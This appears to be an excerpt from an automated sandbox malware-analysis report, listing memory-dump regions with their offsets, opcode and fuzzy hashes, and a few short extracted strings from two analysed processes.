                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b3edfdc1b3370c16def334bc40a7261b61f75438482f6690ed4598535bb95fd7
                                                • Instruction ID: 4827d40613a2aa26f9df40ee5bc64c1b488e00b54387c5c819c842706746a7b1
                                                • Opcode Fuzzy Hash: b3edfdc1b3370c16def334bc40a7261b61f75438482f6690ed4598535bb95fd7
                                                • Instruction Fuzzy Hash: 74210431EAD5999FE7649758A845AFD77F2FF89390F9401B7E00EC3181CE5878008392
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d6286777307ebce3dd036b7931ce02de578a087186db6adf76a5203efa21f2ad
                                                • Instruction ID: 624cf2c39532d0fde4a08f1a2557e258aa5730554ce3ca3212b8e5eef4a71967
                                                • Opcode Fuzzy Hash: d6286777307ebce3dd036b7931ce02de578a087186db6adf76a5203efa21f2ad
                                                • Instruction Fuzzy Hash: DC31B43094965E8FEB84EFA8D4986ED77B2FF99350F400479E00EE7292CB395910CB41
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e99a2fac0598e9397d59e7f6348788d7ff59a4fe143794230960acb10351c72a
                                                • Instruction ID: cf67ec9cfcb3bb39042ed3680bcb83fcb773f16476e812b48b1ec31422d3f65c
                                                • Opcode Fuzzy Hash: e99a2fac0598e9397d59e7f6348788d7ff59a4fe143794230960acb10351c72a
                                                • Instruction Fuzzy Hash: 6B210531DAE5199FE7269B5868099FD7BF2FFA9390F84017BE00EE3181DE186801C795
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 616222df9f1a0d0522230c851cbcf4d6a584e8d9e1d816487b923d750d817cec
                                                • Instruction ID: 7a220c8da590cdfc293308b71f8ea66053ef498e46e2a21c88f70710fdc1ba45
                                                • Opcode Fuzzy Hash: 616222df9f1a0d0522230c851cbcf4d6a584e8d9e1d816487b923d750d817cec
                                                • Instruction Fuzzy Hash: 212150718DF2C11FD71747306C269E63F75AF03264B0E41E7E4988A8A3C51D6697C366
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b20000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a11c7301c9933ba70c62b19c70af13461c215e076ff20fa1a7d64946d72d53a
                                                • Instruction ID: e9abc32d75acdebecf3427d8d5c6c8c5ccbad158c76d7150493fa365f2a867e1
                                                • Opcode Fuzzy Hash: 4a11c7301c9933ba70c62b19c70af13461c215e076ff20fa1a7d64946d72d53a
                                                • Instruction Fuzzy Hash: 4421F370D1960E8FDB58DFA8D8406EEB7B2FF49350F50053AE41AE3291DB38A940CB90
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b20000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 254306b2c4158481eab43af6dfab069a5e6d19b71f68898225f1ef5b36c0b211
                                                • Instruction ID: 672a8f0530a8e873517434f5a7d2d1a0cc1602b490a2da66be570297cd1ca20a
                                                • Opcode Fuzzy Hash: 254306b2c4158481eab43af6dfab069a5e6d19b71f68898225f1ef5b36c0b211
                                                • Instruction Fuzzy Hash: 2721D334A5991D8FDF84EB98D495AECBBF2FF69340F911069D00EE7252CA24A881CB00
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 10f1929be30b0967087807369da11c2230fbfeda5ca78d7d1c94e9dfb8e1cbe4
                                                • Instruction ID: 056f7003799a46362ea2a7d92b43aa0be6d8a2890e3d76e258ccaf30e43accee
                                                • Opcode Fuzzy Hash: 10f1929be30b0967087807369da11c2230fbfeda5ca78d7d1c94e9dfb8e1cbe4
                                                • Instruction Fuzzy Hash: D9213830D6A4099FDB58EB58E4916FCB3B6FF59380F809078D01DA3292CE34A985CF04
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ed9e417aeaf82a6777aeebb9e16b3439bed44c0040d9117c29711bfc70451290
                                                • Instruction ID: 1e1d59528020afe1f5643efb71224d8df292ded3bdde5918dd48abc5607a51a8
                                                • Opcode Fuzzy Hash: ed9e417aeaf82a6777aeebb9e16b3439bed44c0040d9117c29711bfc70451290
                                                • Instruction Fuzzy Hash: 68112930D6A4099EDB58DB58D4956FCB3B6FF59380F805079D01DA7296CB34A885CF14
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e6abeac9b8bff7c8d37ee596b67c058327d7908ef8b13861a8befe88ec9135c
                                                • Instruction ID: 0399ad09d4560f9b2893912e639c6f52cab6bd9a90e9a88c5dd45988ab980e44
                                                • Opcode Fuzzy Hash: 0e6abeac9b8bff7c8d37ee596b67c058327d7908ef8b13861a8befe88ec9135c
                                                • Instruction Fuzzy Hash: C711BF3189E2CA5FD74297B498126EE7FB4BF06310F4941E7E498D6493CA2C1656C362
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f4ca55d3bba9a689a9361b55b518e1171de8e38597a0e73b3906445def8f4651
                                                • Instruction ID: 2bb21cf7e45e11864ba92589e1f3297bc2830647e1aa7305b6f5b48113fc1905
                                                • Opcode Fuzzy Hash: f4ca55d3bba9a689a9361b55b518e1171de8e38597a0e73b3906445def8f4651
                                                • Instruction Fuzzy Hash: EC113272D5AA4E4FEB84A668E0829FD7BB2FF58340B80057AC00EC3286DE3818918741
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b9f2e51ca54252a75637945787d6bb75353d3d4bd9679da5d7adc5f0504422db
                                                • Instruction ID: 7b22fa2039201b49d4cd3ac984830466c463129edeb96b4cf004418362d328b5
                                                • Opcode Fuzzy Hash: b9f2e51ca54252a75637945787d6bb75353d3d4bd9679da5d7adc5f0504422db
                                                • Instruction Fuzzy Hash: F801B171A6C9488FEB48EB68E8522ECB3F1FF59360F44007EE00EC2282DA246816C740
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b20000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6b0230ec040d44a10c6f5c69012f60cdd6fa5b82f90c8a869b1ddf6f96e6ca1f
                                                • Instruction ID: 8768d075276b213aa3a005b2da7235c2efd1f7a4c0b49af01c2e647afc9c5f33
                                                • Opcode Fuzzy Hash: 6b0230ec040d44a10c6f5c69012f60cdd6fa5b82f90c8a869b1ddf6f96e6ca1f
                                                • Instruction Fuzzy Hash: 5F019E718487898FD744DF28D88C3AA3FB0FB99314F8446AAD008D6292DB3A44A8C742
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a17df6ca4a71dc3ac6a7031b906547cdc84ecb15f91c37e38486e575217b0bdd
                                                • Instruction ID: bf29fda2a704e354efaa61d373db4aafaeec0876783fc7320b29672465f5b919
                                                • Opcode Fuzzy Hash: a17df6ca4a71dc3ac6a7031b906547cdc84ecb15f91c37e38486e575217b0bdd
                                                • Instruction Fuzzy Hash: 39017C3481AA8D8FDB51EF6898446FD7BB0FF15341F4005B6D428C2146EBB85554C741
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f962931f771504a24c7b3e3218a479e73b29f652ac7e566a6044f5d51b67d9ec
                                                • Instruction ID: 5d65e6695190237153b648240075e04d5d93ae245cd187ff8971aa4347e4ba5a
                                                • Opcode Fuzzy Hash: f962931f771504a24c7b3e3218a479e73b29f652ac7e566a6044f5d51b67d9ec
                                                • Instruction Fuzzy Hash: 8301A731A69A458FD664EB38D0405AA73F2FF59345B9049BEC04EC7996DE38F846C740
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cc50fef2bd502797a5b9bcb211c2ef319f4211271689ddd930e132487d687126
                                                • Instruction ID: 7cc89af1306a21c90edfccc08a830c8906ccb7bbd5357bae76dea15bebc7e7d0
                                                • Opcode Fuzzy Hash: cc50fef2bd502797a5b9bcb211c2ef319f4211271689ddd930e132487d687126
                                                • Instruction Fuzzy Hash: 2E01A231A6AA498FDAA4EB38D0445EA73F2FF58390B9009BDD04EC7596CE38F845C740
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b20000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 28167622cc3d95a3f22d3ea374088a20075ed5ecacd00da83bcb09e8ca94f0fd
                                                • Instruction ID: e17518e83b6b2178a20812d66d02891cfde89576541f59d464ae1e55ace67189
                                                • Opcode Fuzzy Hash: 28167622cc3d95a3f22d3ea374088a20075ed5ecacd00da83bcb09e8ca94f0fd
                                                • Instruction Fuzzy Hash: 08F0F631C5864D9FE744EB68C4442ADBBB1FF48300F4141B5D419C7193DF386984C701
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3c5500f7131488601a34531f7c114344681eb16113abd83bfab75dc2fcfb975c
                                                • Instruction ID: 215d7d2f3bfdae7f97c5e4708179544b3632e0d7b7f60f1f143f352104ff31b9
                                                • Opcode Fuzzy Hash: 3c5500f7131488601a34531f7c114344681eb16113abd83bfab75dc2fcfb975c
                                                • Instruction Fuzzy Hash: 99F0AF32655A0A8BE3259A18E4553D933A3EBC53A0F99067AD44DC7399CE3DE482C700
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a2d7cf2d697dc77884c6a93860fdbaf12e868088c6b4a688a33719a64cef7a63
                                                • Instruction ID: 804549dc310b3290b62231487ad15907f1a7cee48205a52de227f4c5bb3d3315
                                                • Opcode Fuzzy Hash: a2d7cf2d697dc77884c6a93860fdbaf12e868088c6b4a688a33719a64cef7a63
                                                • Instruction Fuzzy Hash: B3F0C832255A064BD315961CE4517DA33A3EBC5361F95457AC84DC73D5DD3DE5C2C340
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b3d69f6a04c8702e0fd25aef974136d2b4ad7d3883e599f2ce12bb5e652b0133
                                                • Instruction ID: d49a02957f3b464ba046a82a92e2aeab7efd6e49f3e8430c207a0377d07908b2
                                                • Opcode Fuzzy Hash: b3d69f6a04c8702e0fd25aef974136d2b4ad7d3883e599f2ce12bb5e652b0133
                                                • Instruction Fuzzy Hash: F3F0A931E1980D8FDF84EBA8D459AEDB7B1FF58341B414165D00EE7652DE28A841CB50
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b20000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aae7859785dce7ae1429f085cc233bd23c24430094afcb950bbe5c336bde27d0
                                                • Instruction ID: e0c04204bba250a4b0ea68e480f8dec1fcd998f71af993f12021e756d2eca35c
                                                • Opcode Fuzzy Hash: aae7859785dce7ae1429f085cc233bd23c24430094afcb950bbe5c336bde27d0
                                                • Instruction Fuzzy Hash: 51F01735E0891C8FEF94EB9CD885AECB7B2FB58341F50016AC40DE3255DE386851DB40
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e8e6d49304436328ae88dc98ec7d092bb40445465f0b726ffdcbcf92daa9bacc
                                                • Instruction ID: cf80af8f74f39aafb1ed114db53e900fb13fd4a11f84d24cf4e4b8a4eaa0ff66
                                                • Opcode Fuzzy Hash: e8e6d49304436328ae88dc98ec7d092bb40445465f0b726ffdcbcf92daa9bacc
                                                • Instruction Fuzzy Hash: 7EF0F430829A0D8EEB90EFA888086FDB6B1FB18300F800566E42CD2154EB74A550CB41
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ef64d06bd24abc3522ba2b98d751a461dda183e0394f85903f9aafd859a80e2
                                                • Instruction ID: 181c9709b01913d477dfd75eed35ee53f1a4a27e18627f0c75b34cc74cbbf9f1
                                                • Opcode Fuzzy Hash: 3ef64d06bd24abc3522ba2b98d751a461dda183e0394f85903f9aafd859a80e2
                                                • Instruction Fuzzy Hash: 99F09A3185E28D8FCB66DB6488141EEBFB0BF4A340F8509F6D419C71A2DB385A08D741
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f791e091a381788c70a7a8cb57bd088079cb8772e3730bcd81b4e3069dc4b4f9
                                                • Instruction ID: 75c87a9a2ec64bb8fceb30b759d6211b8a13831e4e3514d0584e53ab92b51056
                                                • Opcode Fuzzy Hash: f791e091a381788c70a7a8cb57bd088079cb8772e3730bcd81b4e3069dc4b4f9
                                                • Instruction Fuzzy Hash: F7E02622C5DBD20FD7A4666564950947BE1EF2921074A04EBC18DC7483ED4C9C418302
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ce4d61a5f821115ad5b46238e6b2c955f29e3d1bf1c73f807f027ed9d76dc9a1
                                                • Instruction ID: d774197b7cb73e75b3c484d270fe1f0b981c1fb962b2c5f85a88b775ce8492b5
                                                • Opcode Fuzzy Hash: ce4d61a5f821115ad5b46238e6b2c955f29e3d1bf1c73f807f027ed9d76dc9a1
                                                • Instruction Fuzzy Hash: 9CB01231B5EC094E70A0E01C243423E00DBFBD81B17740373C00DC329DCC1C58038282
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6065ccd08c7418a69208a1c5074202534f9f6e7e785a7e38a9a230fa036e8997
                                                • Instruction ID: db32680cb98a0a762feb72c06b3934cd7e5e1e9a9f03cd462058f1c8e2c2ced6
                                                • Opcode Fuzzy Hash: 6065ccd08c7418a69208a1c5074202534f9f6e7e785a7e38a9a230fa036e8997
                                                • Instruction Fuzzy Hash: CBB09920CFF80380E82022A008822BE0022BF0C3A8EF00AB2C00E03282FC0E3088E002
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 28a4130308efbe00154d5e0ff7968409124cdcf38bcba6346965886a79e66db0
                                                • Instruction ID: e08f2ab0d6d272a5b10232501a58a9482b6215084d30177c89d10206d49573f1
                                                • Opcode Fuzzy Hash: 28a4130308efbe00154d5e0ff7968409124cdcf38bcba6346965886a79e66db0
                                                • Instruction Fuzzy Hash: 69B002A5CDD84FD1E6342591445507D10EB7F547D2EEC0471D40E55185EC4E29D7E252
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.1526249240.00007FF887B25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B25000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_7ff887b25000_HSZUYllrTVQhIRaXpKBgYbmVnCoTc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: C[_H$b4B$b4B$b4B
                                                • API String ID: 0-3023222061
                                                • Opcode ID: bbe308d835ddeaf7e9de9504fac8b3ef19a5d3bce9cde83ffd2216e86d0bea2e
                                                • Instruction ID: 98d46ffcd008f50212cc1b7f06035545feffd71a201a13e0648ec3dd3221b07e
                                                • Opcode Fuzzy Hash: bbe308d835ddeaf7e9de9504fac8b3ef19a5d3bce9cde83ffd2216e86d0bea2e
                                                • Instruction Fuzzy Hash: C8514A71D5894E9FEF98DFA8D451AACBBF2FF98340F54017AC01DE7286DA286841CB41
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0DL
                                                • API String ID: 0-3174716889
                                                • Opcode ID: eae50ab7e6b633380ef49cede7e7f13cd96b5292a0a6bfb9d8714d95557ba272
                                                • Instruction ID: a1ea0155ad7f5ac433af4a97c68476f090f1803e48bd94e46d88f24f712103b6
                                                • Opcode Fuzzy Hash: eae50ab7e6b633380ef49cede7e7f13cd96b5292a0a6bfb9d8714d95557ba272
                                                • Instruction Fuzzy Hash: 39811870D499198FEB94EA68D895AFDB7B2FF59341F5001B9C00DE7292DE38A981CB40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6B$6B$6B$6B$6B$6B$6B$#S}$0DL$0DL
                                                • API String ID: 0-975879146
                                                • Opcode ID: d99dd3388936d95db7f8892b64244200766db3d5f0a4a38f9e78fc66a63c1260
                                                • Instruction ID: 27f4d19d5645f17ee8700e53ad971ccd85f92bd05f784d646e71217070d1e36d
                                                • Opcode Fuzzy Hash: d99dd3388936d95db7f8892b64244200766db3d5f0a4a38f9e78fc66a63c1260
                                                • Instruction Fuzzy Hash: ECA2A470948A1D8FDBA8EB18C895BA8B7B2FF58740F5041E9D01DE7291DB35AE81CF00
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $r6B$r6B$r6B$r6B
                                                • API String ID: 0-1635170207
                                                • Opcode ID: 3f24e26680eadd88701d4cd174bdf7d84fe40cb3b3e7bd3224bb3878c1ad8e08
                                                • Instruction ID: 0cb43da160e91b1392362ba8dea7ad463d552c2ba404b32d5319939480dcf042
                                                • Opcode Fuzzy Hash: 3f24e26680eadd88701d4cd174bdf7d84fe40cb3b3e7bd3224bb3878c1ad8e08
                                                • Instruction Fuzzy Hash: 21F1AE70A48A498FE759DB68C4906AEB7F2FF58340F1445BEC04EC3696DA39B842DB40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "$"$-$[${
                                                • API String ID: 0-3019564589
                                                • Opcode ID: 0bdd07ff5fcf7b84320f99c3984e54842dcc61774fb91c66c0cf08709ac7174e
                                                • Instruction ID: f507b0dd94621eb4fbc2687f7a4e78d5c427eec772c4d09af64ae43cd5e88b1c
                                                • Opcode Fuzzy Hash: 0bdd07ff5fcf7b84320f99c3984e54842dcc61774fb91c66c0cf08709ac7174e
                                                • Instruction Fuzzy Hash: 69F1D470D186298FDBA8DF68D8947EDB7B2FF59341F6041A9D04DA7281CB386985CF40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: /B$/B$/B$/B
                                                • API String ID: 0-2403987392
                                                • Opcode ID: 69de98167d23011e8b74cac8a66a687a5bd2848bab5bb4dcb12c90d2ebdd0c17
                                                • Instruction ID: 31c6035e64907ec1e3f04d42dd74e2ccf55180882a9f83dc0f35315480e40ea8
                                                • Opcode Fuzzy Hash: 69de98167d23011e8b74cac8a66a687a5bd2848bab5bb4dcb12c90d2ebdd0c17
                                                • Instruction Fuzzy Hash: 23024970918A198FEB95EB68C899BECB7B2FF58300F5040E9D41DD3296DE386981CF41
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6B$L$L
                                                • API String ID: 0-3737499674
                                                • Opcode ID: 7cadaaf6840ae2295acec89a383475b199ce2d80e11d230043b672dc6e88e339
                                                • Instruction ID: 49f8c2d97f4a3c68d71d64d12d1c50d6e5520999906e0a34a7654c3080ca8bed
                                                • Opcode Fuzzy Hash: 7cadaaf6840ae2295acec89a383475b199ce2d80e11d230043b672dc6e88e339
                                                • Instruction Fuzzy Hash: 6FA1B870A08A5C8FDF98EF58D895BA8B7F2FF69301F1045A9D00DE7295CB35A981CB00
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B$r6B
                                                • API String ID: 0-2860294223
                                                • Opcode ID: 41ae2ca4ac8ea2234bcb6a0b46f4e40f397dd5639d4de128f798dd051ee05081
                                                • Instruction ID: 4a5986ed05873bc22aadba78557d3d3cf76c67fa9922809ef3e5aaeb1deac3cc
                                                • Opcode Fuzzy Hash: 41ae2ca4ac8ea2234bcb6a0b46f4e40f397dd5639d4de128f798dd051ee05081
                                                • Instruction Fuzzy Hash: 9DD16B70D586199FEB0DDF68C094ABCBBB2FF59344F2044BEC45AD7282DA396942CB41
